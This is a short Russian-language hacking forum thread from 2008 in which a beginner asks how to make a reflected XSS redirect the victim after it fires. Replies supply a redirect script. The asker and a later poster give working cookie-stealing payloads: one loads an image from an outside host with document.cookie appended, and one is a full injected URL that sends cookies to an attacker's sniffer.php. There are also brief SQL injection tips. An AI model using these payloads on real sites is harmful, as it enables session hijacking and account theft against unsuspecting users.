я в хсс чайник пока полный. Вот есть пассивная хсс вот я щелкаю по ссылке у меня доходит до странички с хсс а можно сделать так чтобы он после поподания на эту страничку переходил на другую например показывал какую нибудь картинку.
я в хсс чайник пока полный. Вот есть пассивная хсс вот я щелкаю по ссылке у меня доходит до странички с хсс а можно сделать так чтобы он после поподания на эту страничку переходил на другую например показывал какую нибудь картинку.
да.
js примерно следующего содержания
<script>
document.location.href="http://yandex.ru";
</script>
оно тебя перенаправит сам понимаешь куда))
Я тож в хсс не особо шарю....но там вродь нада составить скрипт который перекидует выполнять то что те нужно и вставить его в уязвимое поле...
P.S.:Если чтот не так написал просьба сильно не пинать...)
что не получается.У меня такого плана index js
в индексе пишу так
<script>document.location.href="ТУТ у меня хсс "</script>
а в js
img = new Image(); img.src = "http://na-s.ru/images/S0ulVortex_1.gif?"+document.cookie;
Я эту систему взял из видео где показывают хсс yandex
Может у кого есть другая система похожая на эту только чтобы после того как куки крадет кидала на какуюнють картинку или сайт
Последний раз редактировалось S0ulVortex; 15.11.2008 в 16:04..
код чтобы перенаправить на сниффер + кук
http://site.ru/index.php?xss='><script>document.location.href='yo ur_site/sniffer.php?cookie='+document.cookie;</script>
Parti, да в ibase можно объединять запросы оператором union; sql-inj хз смотря как построен запрос - попробуй perl-утилиту isr-sqlget
truelamer, _http://forum.antichat.ru/thread50550.html